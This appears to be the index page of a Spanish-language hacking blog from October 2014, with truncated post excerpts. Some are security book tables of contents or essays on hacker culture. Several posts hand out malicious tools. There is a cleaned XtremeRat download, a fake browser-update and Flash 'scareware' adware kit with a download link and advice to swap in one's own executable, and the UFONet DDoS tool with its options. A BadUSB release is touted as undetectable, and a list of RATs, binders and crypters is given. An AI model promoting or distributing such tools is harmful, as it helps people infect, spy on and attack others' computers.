Kali Linux Network Scanning Cookbook

Publicado Por Unknown // 14:42 // 31 oct 2014
Table of Contents Preface 1 Chapter 1: Getting Started 7 Configuring a security lab with VMware Player (Windows) 7 Configuring a security lab with VMware Fusion (Mac OS X) 13 Installing Ubuntu Server 16 Installing Metasploitable2 20 Installing Windows Server 22 Increasing the Windows attack surface 24 Installing Kali Linux 27 Configuring and using SSH 31 Installing Nessus on Kali Linux 35 Configuring Burp Suite on Kali Linux 39 Using text editors (VIM and Nano) 42 Chapter 2: Discovery Scanning 45 Using Scapy to perform layer 2 discovery 49 Using...
Etiquetas:

Kali Linux CTF Blueprints

Publicado Por Unknown // 17:02 // 27 oct 2014
Table of Contents Preface 1 Chapter 1: Microsoft Environments 7 Creating a vulnerable machine 8 Securing a machine 8 Creating a secure network 9 Basic requirements 9 Setting up a Linux network 9 Setting up a Windows network 9 Hosting vulnerabilities 10 Scenario 1 – warming Adobe ColdFusion 11 Setup 11 Variations 14 Scenario 2 – making a mess with MSSQL 15 Setup 15 Variations 19 Scenario 3 – trivializing TFTP 20 Vulnerabilities 21 Flag placement and design 22 Testing your flags 22 Making the flag too easy 23 Making your finding too hard 24 Alternate...
Etiquetas:

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (II)

Publicado Por Unknown // 16:39 // 27 oct 2014
Todo 'hacker' lleva encima una mochila hecha de cientos, miles de horas de estudio y lectura. Los libros son sus aliados, gruesos libros técnicos donde destaca, desde el principio, la editorial O'Reilly. Pero el mundo de la tecnología cambia tan rápido que el libro solo no puede alcanzarlo: ¿Cómo esperar a que se publique un libro para avisar de un agujero de seguridad, o de la aparición de una nueva versión de un programa? Aquí juegan un papel clave los foros y medios en línea, sean medios de comunicación al uso, blogs, redes sociales, páginas...
Etiquetas:

XtremeRat Limpio C#

Publicado Por Unknown // 17:12 // 22 oct 2014
Cita: RAT’s: aplicaciones de administración remota .Tienen varias funciones como keylogger, capturador de cam, etc. Su función básica es administrar remotamente un ordenador desde otro y poder ejecutar distintas acciones que trae consigo. Por esto esta Sucio :(  http://www.rpp.com.pe/2014-01-27-piratas-informaticos-atacan-el-ministerio-de-defensa-de-israel-noticia_664887.html http://www.v3.co.uk/v3-uk/news/2329614/hackers-dropping-zeus-in-favour-of-xtreme-rat http://www.eset.com.uy/threat-center/index.php?subaction=showfull&id=1354747280&archive=&start_from=&ucat=2&n=2 Descargar...
Etiquetas:

Exploit de Zero-day de Microsoft PowerPoint

Publicado Por Unknown // 16:45 // 22 oct 2014
Parece que no hay fin a las ventanas de cero días, como recientemente Microsoft parcheado tres vulnerabilidades de día cero en Windows, que fueron explotadas activamente en la naturaleza por los hackers, y ahora una nueva vulnerabilidad de día cero se ha revelado que afecta a todas las versiones compatibles del sistema operativo Windows, excepto en Windows Server 2003.  Microsoft ha publicado una revisión de seguridad temporal para la falla y también confirmó que la falla de día cero está siendo activamente explotada por los hackers a...
Etiquetas:

Adware

Publicado Por Unknown // 16:50 // 20 oct 2014
Nuevo modelo de update browser , auto detecta el navegador , funciona , google , ie , opera, firefox y safary Modelo actualizado de flash player and scareware obama.Remplasa el exe por tu exe / landing 0/60 Descargar: http://www.mediafire.com/download/h2w62h8a6vmtzqc/Adware.zip Thanks [?...
Etiquetas:

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (I)

Publicado Por Unknown // 16:31 // 20 oct 2014
No hay ser humano que no tenga un mínimo conocimiento. Pero en la comunidad 'hacker' el conocimiento es vital, materia prima, la sangre que corre por sus venas y razón de su existencia. En septiembre de 1997, la desaparecida revista 'Jumping' publicaba el que posiblemente sea primera reportaje sobre el fenómeno 'hacker' en España. Allí se destacaba, ya en las primeras líneas, esa búsqueda del Grial llamado conocimiento que es la base de la cultura 'hacker': "Los 'hackers', cuya máxima pretensión (en su estado puro) es conseguir toda la información...
Etiquetas:

Mastering kali linux for advanced penetration testing

Publicado Por Unknown // 16:08 // 20 oct 2014
Table of Contents [ ii ] Chapter 2: Identifying the Target – Passive Reconnaissance 43 Basic principles of reconnaissance 44 Open Source intelligence 45 DNS reconnaissance and route mapping 47 WHOIS 48 DNS reconnaissance 50 IPv4 51 IPv6 53 Mapping the route to the target 54 Obtaining user information 57 Gathering names and e-mail addresses 58 Profiling users for password lists 61 Summary 63 Chapter 3: Active Reconnaissance and Vulnerability Scanning 65 Stealth scanning strategies 66 Adjusting source IP stack and tool identification settings...
Etiquetas:

UFONet - DDoS

Publicado Por Unknown // 18:45 // 16 oct 2014
UFONet - es una herramienta diseñada para lanzar ataques DDoS contra un objetivo, utilizando vectores 'Open Redirect' de aplicaciones web de terceros, como botnet. Intrucciones: http://ufonet.sourceforge.net/ número de versión del programa de espectáculos --version y salida     v, --verbose verbose activa en las peticiones     --check-tor de verificación para ver si Tor se utiliza correctamente     cheque --update para la última versión estable     * Configure Request (s) *:   ...
Etiquetas:

BADusb Exploit Liberado

Publicado Por Unknown // 18:05 // 15 oct 2014
 ¿Qué es BAD USB ?  Badusb es creado por ingeniería inversa del dispositivo USB  y mediante la inserción de programas maliciosos en el firmware, por lo que cuando se utiliza un palo infectado su mal estado. Sus puertos USB se hackeado y también lo hará el teclado y el ratón. Algunos técnicos llaman a esto 'exploit del año'.  Este era privada y sólo se filtró en estos días.  pero todavía 0 días y FUD  Por favor, use con responsabilidad.  usted encontrará todas las instrucciones en la página...
Etiquetas:

Liberan el hack para infectar USB de manera indetectable

Publicado Por Unknown // 17:59 // 15 oct 2014
El malware aprovecha un error de hardware que no puede ser parchadoA finales de julio, los expertos en seguridad digital de SR Labs, Karsten Nohl y Jakob Lell, revelaron el descubrimiento de BadUSB, un defecto de diseño en el hardware de los dispositivos USB que permiten infectarlos con malware de manera indetectable. Los especialistas se negaron a publicar el código de su hallazgo por la imposibilidad de crear un parche, pero los investigadores independientes Adam Caudill y Brandon Wilson utilizaron ingeniería inversa para repetir los efectos...
Etiquetas:

Encriptadores en PHP

Publicado Por Unknown // 17:29 // 15 oct 2014
Código: <form action="" method="post"><b> <center><font size="6" face="Verdana" color="green">Simple MD5 & SHA1 Creator <font size="2" color="red"><br><br><br> Plz Enter Your Text : <input type="text" name="text"><br><br> <input type="submit" name="submit" Value="Submit !"><br><br></b> MD5 : <textarea name="textarea" style="border:1px dotted green; width: 355px; height: 25px; background-color:white; font-family:Tahoma; font-size:15pt; color:black"> <?php if(isset($_POST['submit']))...
Etiquetas:

vbulletin 4.x - SQLi Exploit Liberado CVE-2014-2022

Publicado Por Unknown // 17:58 // 14 oct 2014
Fecha: 10/12/2014CVSS: 7.1 (AV: N / AC: H / Au: S / C: C / I: C / A: C) de basecwe: 89  proveedor: Soluciones vBulletinproducto: vBulletin 4Versiones afectadas: últimas 4.x (hasta la fecha); verificado <= 4.2.2* VBulletin 4.2.2 (verificado)* VBulletin 4.2.1 (verificado)* VBulletin 4.2.0 PL2 (verificado)  explotabilidad:  * Explotable de forma remota* Requiere autenticación (ApiKey)disponibilidad parche (hasta la fecha): Ninguno  Resumen vBulletin 4 no limpiar adecuadamente los parámetros para permitir breadcrumbs_createa...
Etiquetas:

SUPER TOOLS! -RATs,Binders ,Crypters ,DDos +

Publicado Por Unknown // 19:13 // 13 oct 2014
Remote Administration Tools/Trojans 1. Cerberus 1.03.4 BETA2. Turkojan 4 GOLD3. Apocalypse 1.4.44. Spy-Net 2.6Rar password: Spy-Net5. Pro Rat v1.96. Poison Ivy 2.3.27. Bandook Rat v1.358. Bifrost v1.09. CyberGate v.1.01.010. Lost Door v4.2 LIGHT11. Beast 2.0712. Shark v3.0.013. Sub7 v2.214. Pain RAT v0.115. xHacker Pro v3.016. Seed v1.117. Optix Pro v1.3318. Darkmoon v4.1119. CIA v1.320. Y3k RAT v1.021. MiniMo RAT v0.722. NetDevil v1.023. Deeper RAT v1.024. Schwarze Sonne RAT 0.1 Public Beta 225. Schwarze Sonne RAT 0.726. Schwarze Sonne...
Etiquetas:

Image Encryption: A Communication Perspective

Publicado Por Unknown // 16:42 // 8 oct 2014
Nosotros tratamos en este libro para mirar el cifrado de imágenes con los ojos de investigadores de la comunicación. Los estudios tradicionales de cifrado se concentran en la fortaleza del algoritmo de cifrado sin tener en cuenta lo que es después del cifrado. Lo que es después del cifrado es la pregunta que debemos responder para seleccionar el algoritmo de cifrado apropiado. Para las aplicaciones de la vida real, lo que es después del cifrado es la comunicación de imágenes cifradas. Con los avances en las aplicaciones móviles y de televisión,...
Etiquetas:

Case Studies in Secure Computing: Achievements and Trends

Publicado Por Unknown // 16:39 // 8 oct 2014
Con la proliferación de la red a través de móvil y la computación móvil, la red y la seguridad informática es de suma importancia. Esto hace de la seguridad un objetivo primordial para muchas aplicaciones de software, especialmente aquellos que involucran interacciones en la red en los diferentes niveles de la pila TCP / IP de referencia modelo. Aparte de la seguridad de redes, otros problemas de seguridad con la tecnología en uso deben ser abordado también. Incluso en el pasado reciente, hemos oído hablar de los ataques de seguridad contra...
Etiquetas: